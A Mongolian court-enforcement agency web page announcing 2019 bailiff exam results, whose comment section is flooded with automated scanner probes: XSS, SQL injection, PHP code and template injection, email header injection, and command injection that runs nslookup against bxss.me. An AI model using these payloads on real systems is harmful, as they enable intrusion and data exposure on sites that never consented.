ШҮҮХИЙН ШИЙДВЭР ГҮЙЦЭТГЭХ ЕРӨНХИЙ ГАЗАР

ШИЙДВЭР ГҮЙЦЭТГЭХ АЛБА

ШИЙДВЭР ГҮЙЦЭТГЭГЧИЙН 2019 ОНЫ СОНГОН ШАЛГАРУУЛАЛТЫН ШАЛГАЛТЫН ДҮН
Нийтлэгдсэн 2019-02-15 15:02:45 | Үзсэн: 1

Шийдвэр гүйцэтгэгчийн сонгон шалгаруулалтыг 2019 оны 02 дугаар сарын 14-ний өдөр зохион байгуулахад 159 оролцогч оролцсноос 61 оролцогч шалгаруулалтын болзол, шаардлага хангаж, шалгалтанд тэнцснийг нийтэд мэдээлж байна.

2019-02-15 15:02:45
Сэтгэгдэл бичих

Нэр :
Таны и-мэйл :
Сэтгэгдэл :
Энд дарж зурган кодыг шинэчилнэ үү
Нийт сэтгэгдэл
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
20DHA3Y[!+!]
2019-02-15 15:02:45
diupbduq :
20feUFA ymwz(9408)
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
20}body{acu:Expre/**/SSion(ymwz(9129))}
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
[url=http://www.vulnweb.com][/url]
2019-02-15 15:02:45
diupbduq :
2019-02-15 15:02:45
diupbduq :
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
2019-02-15 15:02:45
diupbduq :
20<ScRiPt>ymwz(9667)</sCripT>
2019-02-15 15:02:45
diupbduq :
20\u003CScRiPt\ymwz(9850)\u003C/sCripT\u003E
2019-02-15 15:02:45
diupbduq :
%32%30%3C%53%63%52%69%50%74%20%3E%79%6D%77%7A%289765%29%3C%2F%73%43%72%69%70%54%3E
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
20
2019-02-15 15:02:45
diupbduq :
20ymwz(9814)
2019-02-15 15:02:45
diupbduq :
20ymwz(9734)
2019-02-15 15:02:45
diupbduq :
20ymwz(9489)
2019-02-15 15:02:45
diupbduq :
20E49N3[!+!]
2019-02-15 15:02:45
diupbduq :
20ymwz(9554)
2019-02-15 15:02:45
diupbduq :
{{10000186*9999934}}
2019-02-15 15:02:45
diupbduq :
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒ\C|QNcb b_&5 hg ]s0QL
2019-02-15 15:02:45
diupbduq :
acux10807z1z2abcxuca10807
2019-02-15 15:02:45
diupbduq :
acu3194<s1﹥s2ʺs3ʹuca3194
2019-02-15 15:02:45
diupbduq :
209791279
2019-02-15 15:02:45
diupbduq :
'"()&%ymwz(9063)
2019-02-15 15:02:45
diupbduq :
20'"()&%ymwz(9848)
2019-02-15 15:02:45
tppxjfco :
1acuHCF9qn2wLZ
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
208HFM7[!+!]
2019-02-15 15:02:45
ulmadffk :
20gvxcR UdQC(9506)
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
20}body{acu:Expre/**/SSion(UdQC(9352))}
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
[url=http://www.vulnweb.com][/url]
2019-02-15 15:02:45
ulmadffk :
2019-02-15 15:02:45
ulmadffk :
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
2019-02-15 15:02:45
ulmadffk :
20<ScRiPt>UdQC(9933)</sCripT>
2019-02-15 15:02:45
ulmadffk :
20\u003CScRiPt\UdQC(9928)\u003C/sCripT\u003E
2019-02-15 15:02:45
ulmadffk :
%32%30%3C%53%63%52%69%50%74%20%3E%55%64%51%43%289337%29%3C%2F%73%43%72%69%70%54%3E
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
ulmadffk :
20
2019-02-15 15:02:45
qjxeiepi :
''""
2019-02-15 15:02:45
ulmadffk :
20UdQC(9842)
2019-02-15 15:02:45
ulmadffk :
20UdQC(9229)
2019-02-15 15:02:45
ulmadffk :
20UdQC(9490)
2019-02-15 15:02:45
ulmadffk :
20VFTUA[!+!]
2019-02-15 15:02:45
ulmadffk :
20UdQC(9906)
2019-02-15 15:02:45
qjxeiepi :
JyI=
2019-02-15 15:02:45
qjxeiepi :
@@odzLQ
2019-02-15 15:02:45
xnbdhvxx :
20';copy (select '') to program 'nslookup dns.sqli.\013405.85-472.85.c1844.\1.bxss.me
2019-02-15 15:02:45
xnbdhvxx :
251'
2019-02-15 15:02:45
xnbdhvxx :
20;copy (select '') to program 'nslookup dns.sqli.\013405.85-471.85.c1844.\1.bxss.me'
2019-02-15 15:02:45
xnbdhvxx :
20||UTL_INADDR.get_host_address('dns.'||'sqli.013405.85-469.85.c1844.1.bxss'||'.me')
2019-02-15 15:02:45
xnbdhvxx :
'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.85-470.85.c1844.1.bxss'||'.me')||'
2019-02-15 15:02:45
xnbdhvxx :
fXJdF9EV'));select pg_sleep(9); --
2019-02-15 15:02:45
xnbdhvxx :
1PfmjiZl');select pg_sleep(6); --
2019-02-15 15:02:45
xnbdhvxx :
-1));select pg_sleep(6); --
2019-02-15 15:02:45
xnbdhvxx :
cLK60xb5';select pg_sleep(6); --
2019-02-15 15:02:45
xnbdhvxx :
-1);select pg_sleep(6); --
2019-02-15 15:02:45
xnbdhvxx :
-1;select pg_sleep(3); --
2019-02-15 15:02:45
ulmadffk :
{{9999351*10000059}}
2019-02-15 15:02:45
ulmadffk :
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒ\C|QNcb b_&5 hg ]s0QL
2019-02-15 15:02:45
ulmadffk :
acux7999z1z2abcxuca7999
2019-02-15 15:02:45
ulmadffk :
acu6266<s1﹥s2ʺs3ʹuca6266
2019-02-15 15:02:45
ulmadffk :
209215061
2019-02-15 15:02:45
gaiowewy :
${@print(md5(acunetix_wvs_security_test))}\
2019-02-15 15:02:45
ulmadffk :
'"()&%UdQC(9684)
2019-02-15 15:02:45
gaiowewy :
${@print(md5(acunetix_wvs_security_test))}
2019-02-15 15:02:45
ulmadffk :
20'"()&%UdQC(9987)
2019-02-15 15:02:45
gaiowewy :
";print(md5(acunetix_wvs_security_test));$a="
2019-02-15 15:02:45
gaiowewy :
;print(md5(acunetix_wvs_security_test));
2019-02-15 15:02:45
gaiowewy :
';print(md5(acunetix_wvs_security_test));$a='
2019-02-15 15:02:45
xnbdhvxx :
1 waitfor delay '0:0:3' --
2019-02-15 15:02:45
xnbdhvxx :
-1); waitfor delay '0:0:3' --
2019-02-15 15:02:45
xnbdhvxx :
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
2019-02-15 15:02:45
xnbdhvxx :
-1; waitfor delay '0:0:3' --
2019-02-15 15:02:45
xnbdhvxx :
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
2019-02-15 15:02:45
xnbdhvxx :
-1 OR 3+738-738-1=0+0+0+1
2019-02-15 15:02:45
xnbdhvxx :
-1 OR 3+985-985-1=0+0+0+1 --
2019-02-15 15:02:45
xnbdhvxx :
-1 OR 2+738-738-1=0+0+0+1
2019-02-15 15:02:45
xnbdhvxx :
-1 OR 2+985-985-1=0+0+0+1 --
2019-02-15 15:02:45
xnbdhvxx :
1*1*1*20
2019-02-15 15:02:45
rmbkgaia :
/www.vulnweb.com
2019-02-15 15:02:45
fimcqdet :
testasp.vulnweb.com
2019-02-15 15:02:45
fimcqdet :
http://testasp.vulnweb.com/t/fit.txt?.jpg
2019-02-15 15:02:45
fimcqdet :
Http://testasp.vulnweb.com/t/fit.txt
2019-02-15 15:02:45
ngabrpnp :
2019-02-15 15:02:45
xnbdhvxx :
1*1*1*20
2019-02-15 15:02:45
fimcqdet :
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
2019-02-15 15:02:45
xnbdhvxx :
1*1*1*20
2019-02-15 15:02:45
xnbdhvxx :
bMH0wp7d
2019-02-15 15:02:45
xnbdhvxx :
1*1*1*20
2019-02-15 15:02:45
jfnqxnyw :
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2019-02-15 15:02:45
dcusmglu :
news/.
2019-02-15 15:02:45
dcusmglu :
news
2019-02-15 15:02:45
dplgojgb :
http://hitHB0AzLSS79.bxss.me/
2019-02-15 15:02:45
fiuhbrts :
http://testasp.vulnweb.com/t/xss.html?%00.jpg
2019-02-15 15:02:45
vqnhxhco :
'"()
2019-02-15 15:02:45
gjdfedle :
^(#$!@#$)(()))******
2019-02-15 15:02:45
gjdfedle :
!(()&&!|*|*|
2019-02-15 15:02:45
xvagjtnd :
20&n976287=v970815
2019-02-15 15:02:45
mjatclmf :
${9999095+10000297}
2019-02-15 15:02:45
kivfgxgc :
20 bcc:013405.85-441.85.c1844.1@bxss.me
2019-02-15 15:02:45
kivfgxgc :
to@example.com> bcc:013405.85-442.85.c1844.1@bxss.me
2019-02-15 15:02:45
etypjymu :
&nslookup dns.ce.\013405.85-438.85.c1844.\1.bxss.me&'\"`0&nslookup dns.ce.\013405.85-438.85.c1844.\1.bxss.me&`'
2019-02-15 15:02:45
etypjymu :
$(nslookup dns.ce.\013405.85-436.85.c1844.\1.bxss.me)
2019-02-15 15:02:45
etypjymu :
set|set&set
2019-02-15 15:02:45
mvofwtxj :
B8lVSmhv
2019-02-15 15:02:45
qvdecbxm :
20'>">
2019-02-15 15:02:45
qvdecbxm :
20
2019-02-15 15:02:45
dwhebkus :
"+response.write(9196255*9422592)+"
2019-02-15 15:02:45
dwhebkus :
'+response.write(9196255*9422592)+'
2019-02-15 15:02:45
dwhebkus :
response.write(9196255*9422592)
2019-02-15 15:02:45
Нийслэлийн шийдвэр гүйцэтгэх газар
 • Утас :
  70001480
 • Факс :
  70001482
 • Имэйл :
  shgg@cd.gov.mn
 • Манай хаяг :

  Улаанбаатар хот, Сүхбаатар дүүрэг, 10-р хороо, Цагдаагийн гудамж ШШГЕГ-ын хоёрдугаар байр